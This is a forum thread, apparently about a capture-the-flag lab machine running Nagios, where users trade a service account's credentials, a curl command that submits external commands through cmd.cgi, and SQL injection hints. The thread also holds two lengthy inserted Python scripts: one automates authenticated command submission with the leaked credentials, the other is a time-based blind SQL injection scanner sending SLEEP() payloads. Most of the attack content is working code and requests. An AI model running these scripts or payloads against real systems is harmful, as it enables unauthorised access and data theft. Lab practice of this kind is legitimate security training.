Posts: 56
Threads: 5
Joined: Nov 2023
Jan 13, 2024, 09:32 PM
(This post was last modified: Jan 13, 2024, 09:54 PM by RebeLHeX.)
I tried this with no luck... what is your endpoint?
(Jan 13, 2024, 09:25 PM)DataNinja Wrote: PING WORKS!
![Image: yeCEPsM.png](https://i.imgur.com/yeCEPsM.png)
OK, got the ping also working with service icmp, so we are allowed to use some cmd.cgi.
curl snippet
# Basic auth with the svc account and -k (untrusted lab certificate) added so the snippet runs as posted;
# the nagFormId token is per-form, so take a fresh one from the GET of cmd.cgi before committing.
curl -k -s -X POST -u 'svc:XjH7VCehowpR1xZB' \
  --data-binary $'nagFormId=a30151f1&cmd_typ=3&cmd_mod=2&host=10.10.x.x&service=icmp&persistent=on&com_data=test&btnSubmit=Commit' \
  $'https://nagios.monitored.htb/nagios/cgi-bin/cmd.cgi'
Posts: 9
Threads: 1
Joined: Dec 2023
Jan 13, 2024, 10:45 PM
(This post was last modified: Jan 13, 2024, 10:48 PM by fenrir54.)
Nagios core is running on https://nagios.monitored.htb/nagios/
And I'm able to log in with svc:XjH7VCehowpR1xZB but can't find anything useful
Posts: 21
Threads: 0
Joined: Dec 2023
(Jan 13, 2024, 09:32 PM)RebeLHeX Wrote: I tried this with no luck... what is your endpoint?
(Jan 13, 2024, 09:25 PM)DataNinja Wrote: PING WORKS!
![Image: yeCEPsM.png](https://i.imgur.com/yeCEPsM.png)
OK, got the ping also working with service icmp, so we are allowed to use some cmd.cgi.
curl snippet
# Basic auth with the svc account and -k (untrusted lab certificate) added so the snippet runs as posted;
# the nagFormId token is per-form, so take a fresh one from the GET of cmd.cgi before committing.
curl -k -s -X POST -u 'svc:XjH7VCehowpR1xZB' \
  --data-binary $'nagFormId=a30151f1&cmd_typ=3&cmd_mod=2&host=10.10.x.x&service=icmp&persistent=on&com_data=test&btnSubmit=Commit' \
  $'https://nagios.monitored.htb/nagios/cgi-bin/cmd.cgi'
But how are you supposed to upload cmd.cgi to the server?
Posts: 312
Threads: 7
Joined: Oct 2023
Trying to get something useful in CGIs, but nothing.
GET /nagios/cgi-bin/cmd.cgi?cmd_typ=22&host=localhost&service=SSH HTTP/1.1
POST /nagios/cgi-bin/cmd.cgi HTTP/1.1
...
nagFormId=a9e827f8&cmd_typ=22&cmd_mod=2&host=localhost&service=SSH&btnSubmit=Commit
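The two requests above show the full cmd.cgi flow: a GET of the command form, then a POST that carries the nagFormId the form issued plus cmd_mod=2 to commit. The script below is an added example (not code from the thread or from Nagios) that automates that flow so a command can be replayed without copying tokens out of Burp. The URL and the svc Basic-auth credentials are the ones posted in the thread; the assumption that the form contains an input named nagFormId with a hex value, and that 10.10.x.x stands in for a real host, are mine.

```python
"""Submit a Nagios Core external command through cmd.cgi (added example).

Two-step flow as seen in the posted requests: GET the command form to read
the nagFormId token, then POST the same fields with cmd_mod=2 (commit).
"""
import base64
import re
import ssl
import urllib.parse
import urllib.request

CMD_CGI = "https://nagios.monitored.htb/nagios/cgi-bin/cmd.cgi"  # from the thread
AUTH = ("svc", "XjH7VCehowpR1xZB")                                # svc account from the thread

# Assumption: the form carries <input type='hidden' name='nagFormId' value='<hex>'>
FORM_ID_RE = re.compile(
    r"""name=['"]?nagFormId['"]?[^>]*?value=['"]?([0-9a-fA-F]+)""", re.IGNORECASE)


def extract_form_id(html: str):
    """Return the nagFormId token embedded in a cmd.cgi form, or None."""
    match = FORM_ID_RE.search(html)
    return match.group(1) if match else None


def build_body(form_id: str, cmd_typ: int, host: str, service=None, **extra) -> str:
    """URL-encode a cmd.cgi POST body in the field order the posted request used.

    cmd_typ selects the external command (3 in the thread, sent with the
    host/service/persistent/com_data fields); cmd_mod=2 commits instead of
    rendering the confirmation form.
    """
    fields = {"nagFormId": form_id, "cmd_typ": cmd_typ, "cmd_mod": 2, "host": host}
    if service is not None:
        fields["service"] = service
    fields.update(extra)
    fields["btnSubmit"] = "Commit"
    return urllib.parse.urlencode(fields)


def _http(url: str, data: bytes = None) -> str:
    """GET (data=None) or POST with HTTP Basic auth; returns the body as text."""
    token = base64.b64encode(f"{AUTH[0]}:{AUTH[1]}".encode()).decode()
    req = urllib.request.Request(url, data=data, headers={"Authorization": f"Basic {token}"})
    if data is not None:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # lab certificate only; never do this in production
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def submit_command(cmd_typ: int, host: str, service=None, **extra) -> str:
    """Fetch the form for this command, then commit it with the token it issued."""
    params = {"cmd_typ": cmd_typ, "host": host}
    if service is not None:
        params["service"] = service
    form_id = extract_form_id(_http(f"{CMD_CGI}?{urllib.parse.urlencode(params)}"))
    if form_id is None:
        raise RuntimeError("no nagFormId in the form; is this user authorised for the command?")
    body = build_body(form_id, cmd_typ, host, service, **extra)
    return _http(CMD_CGI, body.encode())


if __name__ == "__main__":
    # Replays the thread's request (cmd_typ=3 on service icmp) with a fresh token.
    print(submit_command(3, "10.10.x.x", "icmp", persistent="on", com_data="test")[:300])
```

A missing token usually means the CGI refused to render the form for that user or host/service pair, which is itself a useful signal when mapping which external commands the account is authorised to run.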
Posts: 10
Threads: 0
Joined: Jan 2024
you all got into https://nagios.monitored.htb/nagiosxi/login.php with svc:XjH7VCehowpR1xZB ????
I get The specified user account has been disabled or does not exist.
Posts: 8
Threads: 0
Joined: Jan 2024
(Jan 13, 2024, 11:28 PM)zeroedbykrycek Wrote: you all got into https://nagios.monitored.htb/nagiosxi/login.php with svc:XjH7VCehowpR1xZB ????
I get The specified user account has been disabled or does not exist.
not https://nagios.monitored.htb/nagiosxi/login.php try https://nagios.monitored.htb/nagios/
Posts: 312
Threads: 7
Joined: Oct 2023
Try to find SQLi in
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: nagios.monitored.htb
...
action=acknowledge_banner_message&id=3
Not much success (maybe a rabbit hole).
Posts: 10
Threads: 0
Joined: Jan 2024
(Jan 14, 2024, 12:26 AM)ElBakhaw Wrote: I'll share a full writeup 100% free tomorrow, I have rooted
any hint on what to look into after getting the nagios panel using svc creds?
Posts: 148
Threads: 2
Joined: Oct 2023
(Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: any hint on what to look into after getting the nagios panel using svc creds? Try finding an SQL injection vulnerability and dump those tables.
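Both the banner_message-ajaxhelper.php request posted earlier (action=acknowledge_banner_message&id=3) and the "find an SQL injection" hint above come down to the same first step: measuring whether one parameter reaches the database unescaped. The script below is an added example, not code from the thread, and it does not claim the endpoint is injectable; it only compares response times for a control value against SLEEP() probes in the usual numeric and quoted contexts. The URL and form fields are the posted ones; the session cookie, the MySQL/MariaDB-style SLEEP() syntax and the timing thresholds are assumptions.

```python
"""Time-based blind SQL injection probe for one POST parameter (added example)."""
import ssl
import statistics
import time
import urllib.parse
import urllib.request

URL = "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php"  # from the thread
COOKIE = "nagiosxi=REPLACE_WITH_SESSION"   # assumption: an authenticated Nagios XI session cookie
DELAY = 5                                  # seconds each probe asks the database to sleep


def probes(base_id: str, delay: int = DELAY):
    """(label, id-value) pairs: an unmodified control plus SLEEP() probes for
    the contexts a numeric id is commonly embedded in (MySQL/MariaDB syntax assumed)."""
    return [
        ("control", base_id),
        ("numeric", f"{base_id} AND SLEEP({delay})"),
        ("single-quoted", f"{base_id}' AND SLEEP({delay})-- -"),
        ("parenthesised", f"{base_id}) AND SLEEP({delay})-- -"),
    ]


def body_for(id_value: str) -> bytes:
    """The form body shown in the thread, with id replaced by the probe value."""
    return urllib.parse.urlencode(
        {"action": "acknowledge_banner_message", "id": id_value}).encode()


def is_delayed(control_secs: float, probe_secs: float,
               delay: int = DELAY, slack: float = 1.0) -> bool:
    """True when the probe took at least (delay - slack) seconds longer than the control."""
    return probe_secs - control_secs >= delay - slack


def timed_post(id_value: str) -> float:
    """POST one probe and return the wall-clock seconds until the body is read."""
    req = urllib.request.Request(URL, data=body_for(id_value), headers={
        "Cookie": COOKIE, "Content-Type": "application/x-www-form-urlencoded"})
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # lab certificate only
    ctx.verify_mode = ssl.CERT_NONE
    start = time.monotonic()
    with urllib.request.urlopen(req, context=ctx, timeout=DELAY * 4) as resp:
        resp.read()
    return time.monotonic() - start


def scan(base_id: str = "3", repeats: int = 3):
    """Median-of-n timing per probe against a median control; returns the labels
    whose delay matched. An endpoint that casts id to int returns an empty list."""
    control = statistics.median(timed_post(base_id) for _ in range(repeats))
    hits = []
    for label, value in probes(base_id)[1:]:
        took = statistics.median(timed_post(value) for _ in range(repeats))
        if is_delayed(control, took):
            hits.append(label)
    return hits


if __name__ == "__main__":
    print("delayed contexts:", scan() or "none")
```

Timing alone is noisy on a shared lab box, which is why each measurement is a median of several requests; a hit in exactly one context (numeric but not quoted, say) is the normal signature of a real injection, while hits in every context usually mean the server was just slow. If nothing delays, diff the response bodies and status codes for the same probes before writing the endpoint off as a rabbit hole, since a parameter that is integer-cast will never sleep but may still leak through an error message.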
Posts: 21
Threads: 0
Joined: Dec 2023
(Jan 14, 2024, 12:56 AM)peRd1 Wrote: (Jan 14, 2024, 12:33 AM)zeroedbykrycek Wrote: any hint on what to look into after getting the nagios panel using svc creds? Try finding an SQL injection vulnerability and dump those tables.
But where should we find the SQLi, in the Nagios XI login?